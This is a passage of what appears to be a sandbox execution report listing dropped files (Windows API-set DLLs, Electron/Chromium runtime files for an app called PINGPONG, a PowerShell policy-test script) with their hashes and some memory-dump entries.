SHA512 7de60df87d9084773993b5bb030b791af95ffc4d3f28d42c65a40fe1f00a76e38689fbcded605ff1207d853496c475b10b256121446acbf2d38836d4dd2cef45

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-time-l1-1-0.dll

MD5 938a8212206af7b4f96b56766a43d796
SHA1 c509d3f50125a5ff24b684fd53817815b42d86f1
SHA256 8ae052a8781a6c14fe3daacabfea5ce97e4f6c089f489cb816dd9d01aea1c7d8
SHA512 e3501815c92620e3395075517806514d4f23a336098abe665212073bf09ab1d0934ec9e16e5ff3864a54c583c00020ccad3d88535e14382729e396aede7c8d79

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-string-l1-1-0.dll

MD5 22bba6d0bcecc864239f04ca9245f3c0
SHA1 c02dcd24864d635682876a6c498ddece15f9b78b
SHA256 332167ba9fd4a9f97eaf7010ab792e61f7446bbcb73609df9d4c5671313ea7d2
SHA512 ec605ff5e9289c11fba2fc501803e8eb65271c963f1c37e04cb2e81bc1c73c628a1aa05bf5d8cadd7b80979486217caac0260fd2d504be88985d21af019dd031

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-stdio-l1-1-0.dll

MD5 50c58267987c5ae1b6afe78ae70051a8
SHA1 8bf02c849ac69947d8dbad6cd8bd9f174913650c
SHA256 c6526e5fe29a504a08c6f0661d75c140e86ca442ce5d82393861661043c250e5
SHA512 371e6ee11cfbba6d3078fa8daa2b992c440df34a0eee3fafbf789a115b0f4d6b0bb41cd1d720c9a442991b0abcbd0468b90201b38ee5bed67dbd0dd4f92ad0dd

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-runtime-l1-1-0.dll

MD5 78af396c719498f573282ab147b0f8e3
SHA1 646ea46b05d008e3cb1062a539acc76b83c769c0
SHA256 ec28e1f8e20529616b903d94b76801dcae62c333b838b0679a0756261e470aa1
SHA512 105b311f3a1ece3303dbb9c865630aa767356ed02968cca784bb39357525568fbada163d90a224c6425c5a2475b313e8f2377c377938d9ca4bf2287910799a85

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-process-l1-1-0.dll

MD5 f0087fb8acf73e0a777781e054283315
SHA1 5ecc79ad2e9084a346fd9edd63d35a317416e9e1
SHA256 e58aafd6526238b41d16658f6e919eedba742e8e7a94dffc00754f8090060b91
SHA512 093a519c0e434020b26d5e3d533d694385bf24caeb2977886d3f257e8e87af441a82c121cec3789365bf76d2ce85ae6d8819237f4ab4c3fea8fdab7e449ccd0f

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-math-l1-1-0.dll

MD5 438c6d8a2769a48f744de80d0107a000
SHA1 7ab7b64ba54b9d1e54488a14aa94e1f37650d932
SHA256 8c1a84335b97b8e174e3758e0b6f4899056fb4b2b915c33d26abc305f41107aa
SHA512 1f4039656c35566b9fb1fb06bf30690c81f66a0c9e35772156d3f333c1cdb833eb618965b96244452c3fd2791eaca140ebbcfa7f8df989487bd4f79710164d3b

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-locale-l1-1-0.dll

MD5 e9bd616c5a0889dae98b5c1a52eb55dc
SHA1 08f38484d24a89e6287cbfce815fcc565574bf9d
SHA256 ace4a3060f36a1fd56ded100142046e04d019e42724ff2ab3b7a3274c595c873
SHA512 5c14acdd2cb9df4b951a3e0ad3f81854a62426f9731fc47d036be14e6ee06eed7abdbd00bafa41bfde4b2ea5f1e60d99352e376446cae73f799eadcb84787488

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-heap-l1-1-0.dll

MD5 e179b8af28653b9f2a2817c4de4e17e3
SHA1 7d42cf9e369a22f4e17cf509781811b6abddc4dd
SHA256 9b6a5bb469fc1506673ffe5d35019e33c4a297b04674a11b7b3bd63b358bf06a
SHA512 6f5df48b7dca5c001fd02b41dcfcc74af69a89446a8372ab81cecc9767ab35be4a95f02d7523c41adb911f9ab997cba7f9be1d7b30e53438ff044f28d8d43ec8

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 d6107e2b4ddff0a76c70905c92a83e09
SHA1 d6ad3a3d267f9acfc9ad2fb48a9a356829d6a40b
SHA256 b2f1f3888c5b735327742cf211ba50a27b55aba6d66a245591f99d68b1177f54
SHA512 592170e96e150056c43b53674197cc2f391b05a322cb362353b5bbe98028d4ec054c6d1e1b6584c76f0723dc0d28cf8e57df2fb956beb9290d78b1d3d56e3573

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-environment-l1-1-0.dll

MD5 3dfc2cb973f6fdf15a22b20a84d75bd1
SHA1 b88841498fc5d3a04fdb5f18ca105ebab1daf7cf
SHA256 dbab28e2d1576d57e667fae5463019a5b652dec3c26e5831117812fffd6c5d28
SHA512 5b736542a10cb4ae5fe9b84a2cafbd9df77e660ceea2cab31eb4b3263fde9dc0284becf598741f3ea3f052671c33079b7d44e3a00593cc5be258c01b5fcd7414

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-convert-l1-1-0.dll

MD5 778d1feb2b9009e214a07b252dd891d7
SHA1 791dee1f212e27a014c3b887e94d804fc5718517
SHA256 d8ea79ea76f1e053f3e137c411b4d2a26e2e091ad0e641197e27c852751171c5
SHA512 a14c6e80942ecfbe105def6ae497dc3d8073c6b2ec2cb80ced992c46ac050beb50c05e2fdcb38f85d0f921ff4ca6d2a6d3e07bf52bfafd3a4dccccf2155faa00

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-conio-l1-1-0.dll

MD5 5bf7a5fbcbfc77c84f09ae0946040d7d
SHA1 c948aaf1cb0a88ba54f3309a8bb21643d3cfd905
SHA256 bc9aa7bf5fa7f0751e97f5497e3799cf4a1b86e158df47488f189edd628dcc5b
SHA512 2ff3d0d7a415f8962095a25e66a0e75e9efa375d273a3f5a9ec637156c9454c371791578e16332ac402f54fa6bb1cd738e611f074e7b87f1b016b0daed966fa8

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-util-l1-1-0.dll

MD5 5fc7cacb5fba2dc17b6ddcc14aa1837f
SHA1 2e7497f0201a1af6e4e3794efe88f407f8e8bd59
SHA256 4383df6e06d9d72e4078db5d2df366837d2dc29ad45bf550f7dbdc7ac1aa17dd
SHA512 71e98e1491b4c974fca0a0ae32af4f028407e7fc2eae773d09c140d2d4fa9296e75a76b87f055e35f577d9874fd024bf08fd6176afc80afd35466cf08ae022a5

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-timezone-l1-1-0.dll

MD5 b83d28b1babea99ee95d5e81ea61fb1c
SHA1 f4d492ece484e75b5cdcf680f8c8280b1ae52118
SHA256 baca05368d3adc7769be8687280a45ac3d72141cfd3d7e67453749ca70320e1e
SHA512 dfaf105ac537337e7ad00931c5fc44994f45537b5bacb9036c95a555b879de9d63ea19d19987b262413d205244fafa5e09d7db9568af5796eb9eb6f54421e0a3

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 669a04138caa00c8ab8257757033d58f
SHA1 7285267e56fb31ab57ec837093b86ca02651c6ee
SHA256 cf7e57617882f13190d0449cef2584fe8e205e607840a189a901ad308585783e
SHA512 da2cf57003f7e67d3ab37ae4d0958061514ec2178bc9509538dfc9842b27b7fff5e89b47a571f6dc6dc7077205eadbcf45f52b939be980733827d8cc62e404a5

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-synch-l1-2-0.dll

MD5 f113a4eaef7336c3ac1e870bd355b0b7
SHA1 01ca597ac5f20bdda64d3a472164fe4fdde540ea
SHA256 e32713a9fbb0a39bcab35a419ad0f53e7b6c5594ad14f375360218a671238321
SHA512 799aa7f57eaf3ba7fb3827938bb1fe2fb24c5192ae493bdff9ad35dfa0051b220e75d5b93f5bba7075c7684322fcdf7c647408839a6ecc95b52659fa19960779

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-synch-l1-1-0.dll

MD5 82e644644f2b463aa0f066713d8b0e80
SHA1 fdbf3e440202cc226cfbb3377039f33292b8f0fb
SHA256 7f6b69f1ff8463ea8cc6b542c2c69d97710de6c9d614c7d2e36378b07f24e45e
SHA512 0016092a8cfad99d82857e9093f0b2ab129fa77ba557cfc00262add333f5ea4598a39b012c80113713a456eea87f41355720ddf3ddae064d8136cd22f42e1eec

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-string-l1-1-0.dll

MD5 39e0e424d7d75f00820055317c74453d
SHA1 6a3afa6995f63a7608d3f480ab400cc17c1841f2
SHA256 926d2ae2555068f2f12a9ff953d0a7c988288ec99ce2648d640d4076d3181ea4
SHA512 95dd9f21b5a3a053ba6084f833d25f49cdef1e16670ccc9837d04b957bc882293c127e70ec615330f853cd1a870131203102d520c4ccda0b29b49e22ff9a76c6

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 a262219291d89c96a2401a4c73de15c2
SHA1 098398144841db678083d8a0bd5bc9d1827caa18
SHA256 97400329139b9b4a95e52d56e5c01f55ba9f6cd4e20e6bed1a391ae52c1d1eb6
SHA512 546af45c031b58d8c506a0df488772dcc7f74f588598d61d00692b07e2d280fd2e21077bf4c89e8b764991e7fa9337d9c8d477cf5fd6c1e8dc8f28009f55af89

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-profile-l1-1-0.dll

MD5 a33bf3177c9e2b0db7a55e830146f1ff
SHA1 c3ac80075d0a65a613661a9e790bebc8c1608c9a
SHA256 25cc487fe36fad0f2b6ab2685427124627c63e7961c5faf1267f0e2dd04b334b
SHA512 ce4ea63ba7f10f8b9a573ffc9e9b31ca1050f6e2d653159589b945ad9ff216dce3cc3752292651ca9da1fc4502e1266792e40b92876b217c14130b10e6c7de51

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-processthreads-l1-1-1.dll

MD5 9e7441ef965b380b75b82a1c9cd3884e
SHA1 274bcfe166f2bd0e62fb3d8f64b7adfa04963f5f
SHA256 8ea398785960e5fa143b97a333e60f9466b4f7f94f5dd173c02a2aa628d00c2f
SHA512 efe08a8211e0e9381bc8749bd2d20558431495ba82685ed91b65deebda10ad8d455014ccc762d94361cc2f801315d46b9da31aba7fea87503f95db4a09112e7a

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-processthreads-l1-1-0.dll

MD5 150420d09ffbf973444f9878feb887e0
SHA1 cc77c7500b0f4b426d9a6d26fb64203feac6e24b
SHA256 27b881f112c79e6ba7dcd8dae34f2129071dbb83ee918d80e2827f791c365f83
SHA512 ecad140a9fceb7ab2d3ff103fea137d95235a7574534c96cbcfc83e3c1efd7e57b48ab48440f775e52cc81111c7ac09acd468e959840d85b9bf0f0697f913398

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 e6531089823195de4a824e0b0f198313
SHA1 08783daa376afd97d09e4c7f5d2a161e97cbf288
SHA256 cb8c03e53b2f36dbc898799219a5f8bc4e4f906f58802ff190a0415e5f07c840
SHA512 91bb5975be92a6b95079364a2273636fb9c843bf2eaacb81337190a5d810d3853a740c3c6b685e0fc22774a47b02aef41c0873a267a0a9e1db9d41ddda917708

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 79db1cfe9b49b43b3da526fb52c44b4f
SHA1 e337ede1917460e9892f98254debc2c9b368bc39
SHA256 487cb8b98ffc9913ddc351606e3a9d371ce8ac85df94d3f68a9ee297a67a2aa9
SHA512 75e8f2a173ddde674a045ce6f60da6262de19adf6cafa9f5b70476159e3f8ac334bb540892f207efb982a7a0db81ad32283c50d7bf62376e94c88fbe15f6fcf0

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-memory-l1-1-0.dll

MD5 0a19703e77d8b4bd542beef430022c1f
SHA1 051ab7284640b37be287a28d6d15fedcb2b44291
SHA256 b9b91f56c8bd09d230cc6895088978638f57d3a7b379661ac1cc88b82d4819de
SHA512 cded7d27149d39e912875ce056511fafd56919e21e3d52404ed294e650d93a318eb5a3017b3b41026061100cc4404210f62fbc2685bd4cd92116bb72eb12bb3e

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-localization-l1-2-0.dll

MD5 5e5b3246910237da716c8b189dc740fd
SHA1 acd1b12a7a5463f2212ba50a1af563073f3eb7aa
SHA256 ca3adc575bc0dd928b5e2b84a254783dbd36a5f18e8b42034407543fbacc2a52
SHA512 e92ebad3b2b39ce04e983cbe4f75d2b6dd26f6f8288cf5c57e24bcbb5fa2e4b59a6dccfaf3c3510b9d1f9e45f430bfdc7994b67c4a2f46211d0e6531fdc34a78

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 607250d5a7ee7bde9a6db712282980d6
SHA1 1926463e5e26fb6e8e4e249e407da7831c4b7c78
SHA256 38c3a997857b0d87e27213af52643ddb31857847a9e3aadcaacf5bc5a64c7f33
SHA512 e6398027fff6dfdc1dfb07d8fe1a87318e7c8bbc1b4c324a99bb713187f9f5e417ba09fbed2f214252cefa3008c01e01469699c109aa80d8e89058ec697f85dd

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-interlocked-l1-1-0.dll

MD5 253b9eaac8520b3c4fe18b1a87af69d9
SHA1 3a17a79dec0343bc2e8e1485134be17eb2189ace
SHA256 4e70bef1550d4f7df37d8b6c86cf450f0b7d8c2a1b604b4063a6f3dc813c21c6
SHA512 8e6808219e67154696aa4f7b99e8cfe2803a61c97cc8bd447cf1a6429ade24967c4c26d00433015fbd466774d8a9e8351e1899307e5405dc3cd0d8cfa0542ad2

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-heap-l1-1-0.dll

MD5 47ab39c89762d245c1558d68f9ac6862
SHA1 893008130dacd4a3c056968507037b03c2ae529d
SHA256 d25c167e9a27942a746d42282f30f6a9b2bebe8c61aec56bdf406e925c923bcf
SHA512 94d37050d2e98f5269423a9e0cb55c3a3801a5aee5f33cae292fc40139f397bc833f72a565cd50de9b1ea6e0e2c3978360da4ac2add8ba63001462c8d0cb848e

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-handle-l1-1-0.dll

MD5 33c88dfbb48d42f2b88760938cd1c691
SHA1 085206825e624e18716e9c80b8ef5584f3ac43d6
SHA256 b071ecef6ddbb75c1880ee5c5c63c688ed8f941f8c407813c655709abbf0a389
SHA512 6d3f01790a8bec1c67a3a2d2ffe90262bc4ec9803c9509373e1c2ee2315d6d0217254ba28fda5844d39e3cfa38a0a9e29c910f2e91e43bc678057fbb41c6ffa2

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-file-l2-1-0.dll

MD5 be64a8905c905581884c987c60f02de0
SHA1 204330902966b5b19552d058c228163a0e425d64
SHA256 fcd3b845010c0caddfa78722c95570bfdccff7770b48c2caa0f4872bfdff6bb1
SHA512 de15220bb4f62e3cd3490b06cf1e52be7a675ebc7f1a5e6b3f3ebe3e069e0b19f1a3fa3fe51c17eee7752abeebf923faec59c2343fd7dfe0da86754caea09d8d

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-file-l1-2-0.dll

MD5 765a243d3a24dc86b832edf0cb5bf6e1
SHA1 86dbf2de0617d9589cd7f2f2507fbdab7c5c922a
SHA256 76c6d607491705e6fdff250c7ca1e7ce1709565786895dc1fb0b28f4782e5dec
SHA512 0e9b401b22fe5e0757789971ef1f47c1ecab173011ab065330beff5c6b91d5ab29afed984f5ff115ce0605e537281a23ac501454a9a46fae625a8eda8c11d6b3

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-file-l1-1-0.dll

MD5 28c2e42a0b3ccae924d47ade467d27be
SHA1 f8555f27c3c4b8e5ee24c790fe8e475770ffbb36
SHA256 253bd5a1b70131a4b436645e70dc8a9e51e3a7d1321114bd231eb317b1111d6a
SHA512 a4bb35308c745d3acff72285de1c061091798cadb8072428b24034f395774677ea8c66a28ba632ce3205f4e55ee5c6c08757ed766199999542c7cacf85d083ee

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 47521e0bce11bcda26687a2a7ad925d8
SHA1 11fd0034bf670ba2f139d8d88eb06ff41c6e320f
SHA256 235fba3ca6fb9dd58a7733d5578f1203d7973b4d2308ad63a07f8e4311b92a38
SHA512 29cf8dc5a4055e9234f02510785cb9db0b02914aa4ed376d9c85a0b0af1df8e90c47b6d8f9d2c45173ffaa3a4abcee3b47061b56a4c1e76c9db8da92456f9f48

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-debug-l1-1-0.dll

MD5 0176e2f43c9b74559092e790e971cd6d
SHA1 a4bb34f3289e2e434a5658d08423fb84669de3fe
SHA256 d06d4fa8afae5d5670a73c99879588a28c9612f25d97d3a716067aa55aedb7e1
SHA512 af06dc759754356e94c9a2af8b384daf54a0043d30381da77bab30fa7a3e8d09cec1fc786c238825f1707787206a6d88ee1d751242d25db61fd68bb339e4605f

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-datetime-l1-1-0.dll

MD5 a1dde4316ccf4ba95fb839546481ad38
SHA1 a0aa9ea0463d23ea1b457cd3afd8ed7c327b2a1f
SHA256 bbedd6a5338ecca437080d6e344836a5c833e250dbcd2beffb4d3fb2eaba4b88
SHA512 a0408e69146aa5f51de0db61d871308a343714e236feadb6f77421860adb67d58ce0d5c15f3050c711c3d9900e16e9fdc8e92c4a95f5ec85f4d702b1f242ef88

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-core-console-l1-1-0.dll

MD5 65d560ef64229755a440752ecfe685ec
SHA1 1333713f7f0bc9c882222cbb7ece206a50795324
SHA256 e995951f7c69f9e3fbfc9eb83e7c869ee732da81885a691bf2b77cd0f377d9ae
SHA512 11f3c40732551611bb0778e42ee0a17bcd1a851a001c7d442c0a6d47589457bdc3107cac8e8f321c6b268577703c9e1f00992093f3db16c895bfe8ff86af5edb

memory/5036-122-0x00007FFF12F53000-0x00007FFF12F55000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sdw5pxaw.ona.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5036-131-0x0000017F38290000-0x0000017F382B2000-memory.dmp

memory/5036-132-0x00007FFF12F50000-0x00007FFF13A12000-memory.dmp

memory/5036-133-0x00007FFF12F50000-0x00007FFF13A12000-memory.dmp

memory/5036-134-0x00007FFF12F50000-0x00007FFF13A12000-memory.dmp

memory/5036-135-0x00007FFF12F50000-0x00007FFF13A12000-memory.dmp

memory/5036-138-0x00007FFF12F50000-0x00007FFF13A12000-memory.dmp

memory/1060-156-0x000001C585500000-0x000001C585508000-memory.dmp

memory/4204-284-0x00000000003A0000-0x00000000003B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\chrome_200_percent.pak

MD5 48515d600258d60019c6b9c6421f79f6
SHA1 0ef0b44641d38327a360aa6954b3b6e5aab2af16
SHA256 07bee34e189fe9a8789aed78ea59ad41414b6e611e7d74da62f8e6ca36af01ce
SHA512 b7266bc8abc55bd389f594dac0c0641ecf07703f35d769b87e731b5fdf4353316d44f3782a4329b3f0e260dead6b114426ddb1b0fb8cd4a51e0b90635f1191d9

C:\Users\Admin\AppData\Local\Programs\PINGPONG\chrome_100_percent.pak

MD5 8626e1d68e87f86c5b4dabdf66591913
SHA1 4cd7b0ac0d3f72587708064a7b0a3beca3f7b81c
SHA256 2caa1da9b6a6e87bdb673977fee5dd771591a1b6ed5d3c5f14b024130a5d1a59
SHA512 03bcd8562482009060f249d6a0dd7382fc94d669a2094dec08e8d119be51bef2c3b7b484bb5b7f805ae98e372dab9383a2c11a63ab0f5644146556b1bb9a4c99

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\d3dcompiler_47.dll

MD5 cb9807f6cf55ad799e920b7e0f97df99
SHA1 bb76012ded5acd103adad49436612d073d159b29
SHA256 5653bc7b0e2701561464ef36602ff6171c96bffe96e4c3597359cd7addcba88a
SHA512 f7c65bae4ede13616330ae46a197ebad106920dce6a31fd5a658da29ed1473234ca9e2b39cc9833ff903fb6b52ff19e39e6397fac02f005823ed366ca7a34f62

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\icudtl.dat

MD5 adfd2a259608207f256aeadb48635645
SHA1 300bb0ae3d6b6514fb144788643d260b602ac6a4
SHA256 7c8c7b05d70145120b45ccb64bf75bee3c63ff213e3e64d092d500a96afb8050
SHA512 8397e74c7a85b0a2987cae9f2c66ce446923aa4140686d91a1e92b701e16b73a6ce459540e718858607ecb12659bedac0aa95c2713c811a2bc2d402691ff29dc

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\ffmpeg.dll

MD5 d49e7a8f096ad4722bd0f6963e0efc08
SHA1 6835f12391023c0c7e3c8cc37b0496e3a93a5985
SHA256 f11576bf7ffbc3669d1a5364378f35a1ed0811b7831528b6c4c55b0cdc7dc014
SHA512 ca50c28d6aac75f749ed62eec8acbb53317f6bdcef8794759af3fad861446de5b7fa31622ce67a347949abb1098eccb32689b4f1c54458a125bc46574ad51575

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\libEGL.dll

MD5 09134e6b407083baaedf9a8c0bce68f2
SHA1 8847344cceeab35c1cdf8637af9bd59671b4e97d
SHA256 d2107ba0f4e28e35b22837c3982e53784d15348795b399ad6292d0f727986577
SHA512 6ff3adcb8be48d0b505a3c44e6550d30a8feaf4aa108982a7992ed1820c06f49e0ad48d9bd92685fb82783dfd643629bd1fe4073300b61346b63320cbdb051ba

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\LICENSES.chromium.html

MD5 180f8acc70405077badc751453d13625
SHA1 35dc54acad60a98aeec47c7ade3e6a8c81f06883
SHA256 0bfa9a636e722107b6192ff35c365d963a54e1de8a09c8157680e8d0fbbfba1c
SHA512 40d3358b35eb0445127c70deb0cb87ec1313eca285307cda168605a4fd3d558b4be9eb24a59568eca9ee1f761e578c39b2def63ad48e40d31958db82f128e0ec

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\libGLESv2.dll

MD5 a5f1921e6dcde9eaf42e2ccc82b3d353
SHA1 1f6f4df99ae475acec4a7d3910badb26c15919d1
SHA256 50c4dc73d69b6c0189eab56d27470ee15f99bbbc12bfd87ebe9963a7f9ba404e
SHA512 0c24ae7d75404adf8682868d0ebf05f02bbf603f7ddd177cf2af5726802d0a5afcf539dc5d68e10dab3fcfba58903871c9c81054560cf08799af1cc88f33c702

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\snapshot_blob.bin

MD5 8fef5a96dbcc46887c3ff392cbdb1b48
SHA1 ed592d75222b7828b7b7aab97b83516f60772351
SHA256 4de0f720c416776423add7ada621da95d0d188d574f08e36e822ad10d85c3ece
SHA512 e52c7820c69863ecc1e3b552b7f20da2ad5492b52cac97502152ebff45e7a45b00e6925679fd7477cdc79c68b081d6572eeed7aed773416d42c9200accc7230e

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\vulkan-1.dll

MD5 0e4e0f481b261ea59f196e5076025f77
SHA1 c73c1f33b5b42e9d67d819226db69e60d2262d7b
SHA256 f681844896c084d2140ac210a974d8db099138fe75edb4df80e233d4b287196a
SHA512 e6127d778ec73acbeb182d42e5cf36c8da76448fbdab49971de88ec4eb13ce63140a2a83fc3a1b116e41f87508ff546c0d7c042b8f4cdd9e07963801f3156ba2

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\v8_context_snapshot.bin

MD5 a373d83d4c43ba957693ad57172a251b
SHA1 8e0fdb714df2f4cb058beb46c06aa78f77e5ff86
SHA256 43b58ca4057cf75063d3b4a8e67aa9780d9a81d3a21f13c64b498be8b3ba6e0c
SHA512 07fbd84dc3e0ec1536ccb54d5799d5ed61b962251ece0d48e18b20b0fc9dd92de06e93957f3efc7d9bed88db7794fe4f2bec1e9b081825e41c6ac3b4f41eab18

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\vk_swiftshader.dll

MD5 a0845e0774702da9550222ab1b4fded7
SHA1 65d5bd6c64090f0774fd0a4c9b215a868b48e19b
SHA256 6150a413ebe00f92f38737bdccf493d19921ef6329fcd48e53de9dbde4780810
SHA512 4be0cb1e3c942a1695bae7b45d21c5f70e407132ecc65efb5b085a50cdab3c33c26e90bd7c86198ec40fb2b18d026474b6c649776a3ca2ca5bff6f922de2319b

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources.pak

MD5 7971a016aed2fb453c87eb1b8e3f5eb2
SHA1 92b91e352be8209fadcf081134334dea147e23b8
SHA256 9cfd5d29cde3de2f042e5e1da629743a7c95c1211e1b0b001e4eebc0f0741e06
SHA512 42082ac0c033655f2edae876425a320d96cdaee6423b85449032c63fc0f7d30914aa3531e65428451c07912265b85f5fee2ed0bbdb362994d3a1fa7b14186013

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\es-419.pak

MD5 7da3e8aa47ba35d014e1d2a32982a5bb
SHA1 8e35320b16305ad9f16cb0f4c881a89818cd75bb
SHA256 7f85673cf80d1e80acfc94fb7568a8c63de79a13a1bb6b9d825b7e9f338ef17c
SHA512 1fca90888eb067972bccf74dd5d09bb3fce2ceb153589495088d5056ed4bdede15d54318af013c2460f0e8b5b1a5c6484adf0ed84f4b0b3c93130b086da5c3bf

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\en-US.pak

MD5 19d18f8181a4201d542c7195b1e9ff81
SHA1 7debd3cf27bbe200c6a90b34adacb7394cb5929c
SHA256 1d20e626444759c2b72aa6e998f14a032408d2b32f957c12ec3abd52831338fb
SHA512 af07e1b08bbf2dd032a5a51a88ee2923650955873753629a086cad3b1600ce66ca7f9ed31b8ca901c126c10216877b24e123144bb0048f2a1e7757719aae73f2

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\fil.pak

MD5 d7df2ea381f37d6c92e4f18290c6ffe0
SHA1 7cacf08455aa7d68259fcba647ee3d9ae4c7c5e4
SHA256 db4a63fa0d5b2baba71d4ba0923caed540099db6b1d024a0d48c3be10c9eed5a
SHA512 96fc028455f1cea067b3a3dd99d88a19a271144d73dff352a3e08b57338e513500925787f33495cd744fe4122dff2d2ee56e60932fc02e04feed2ec1e0c3533f

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\fi.pak

MD5 21e534869b90411b4f9ea9120ffb71c8
SHA1 cc91ffbd19157189e44172392b2752c5f73984c5
SHA256 2d337924139ffe77804d2742eda8e58d4e548e65349f827840368e43d567810b
SHA512 3ca3c0adaf743f92277452b7bd82db4cf3f347de5568a20379d8c9364ff122713befd547fbd3096505ec293ae6771ada4cd3dadac93cc686129b9e5aacf363bd

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\fa.pak

MD5 2e37fd4e23a1707a1eccea3264508dff
SHA1 e00e58ed06584b19b18e9d28b1d52dbfc36d70f3
SHA256 b9ee861e1bdecffe6a197067905279ea77c180844a793f882c42f2b70541e25e
SHA512 7c467f434eb0ce8e4a851761ae9bd7a9e292aab48e8e653e996f8ca598d0eb5e07ec34e2b23e544f3b38439dc3b8e3f7a0dfd6a8e28169aa95ceff42bf534366

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\hu.pak

MD5 2aa0a175df21583a68176742400c6508
SHA1 3c25ba31c2b698e0c88e7d01b2cc241f0916e79a
SHA256 b59f932df822ab1a87e8aab4bbb7c549db15899f259f4c50ae28f8d8c7ce1e72
SHA512 03a16feb0601407e96bcb43af9bdb21e5218c2700c9f3cfd5f9690d0b4528f9dc17e4cc690d8c9132d4e0b26d7faafd90aa3f5e57237e06fb81aab7ab77f6c03

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\hr.pak

MD5 255f808210dbf995446d10ff436e0946
